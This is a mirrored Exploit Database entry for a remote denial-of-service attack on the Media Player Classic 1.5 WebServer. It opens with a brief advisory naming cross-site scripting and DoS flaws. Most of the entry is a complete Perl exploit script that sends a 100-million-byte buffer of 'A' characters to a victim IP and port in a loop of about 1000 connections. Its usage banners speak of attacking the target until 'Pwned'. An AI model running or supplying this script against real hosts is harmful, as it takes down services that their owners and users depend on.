Media Player Classic (MPC) 1.5 – WebServer Request Handling Remote Denial of Service

• Exploit Database
• 98 阅读

• 作者： X-Cisadane
  日期： 2012-11-16
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/38021/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  source: https://www.securityfocus.com/bid/56567/info   Media Player Classic WebServer is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability.   An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.   #!/usr/bin/perl use IO::Socket::INET; use Getopt::Std; use Socket; my $SOCKET = ""; $loop = 1000; $ip = $ARGV[0]; $port = $ARGV[1]; if (! defined $ARGV[0]) { print "\t*=============================================================*\n"; print "\t* ---MPC WebServer Remote Denial Of Service ---*\n"; print "\t* ---By : X-Cisadane---*\n"; print "\t* ------------------------------------------------------*\n"; print "\t* ---Usage: perl exploitmpc.pl ( Victim IP ) ( Port )---*\n"; print "\t* ------*\n"; print "\t*=============================================================*\n"; print "\n"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; print "Default Port for MPC Web Server is 13579\n";   exit; } print "\t*=============================================================*\n"; print "\t* ---MPC WebServer Remote Denial Of Service ---*\n"; print "\t* ---By : X-Cisadane---*\n"; print "\t* ------------------------------------------------------*\n"; print "\t* ---Usage: perl exploitmpc.pl ( Victim IP ) ( Port )---*\n"; print "\t* ------*\n"; print "\t*=============================================================*\n"; print "\n"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; print "Default Port for MPC Web Server is 13579\n"; print "\n"; print " Please Wait Till The Buffer is Done\n"; my $b1 = "\x41" x 100000000;   $iaddr = inet_aton($ip) || die "Unknown host: $ip\n"; $paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n"; $proto = getprotobyname(&apos;tcp&apos;) || die "getprotobyname: $!\n";   print "\n"; print " Attacking the Target, Please Wait Till Pwned \n"; for ($j=1;$j<$loop;$j++) { socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n"; connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n"; $DoS=IO::Socket::INET->new("$ip:$port") or die; send(SOCKET,$b1, 0) || die "failure sent: $!\n"; print $DoS "stor $b1\n"; print $DoS "QUIT\n"; close $DoS; close SOCKET; } # exit :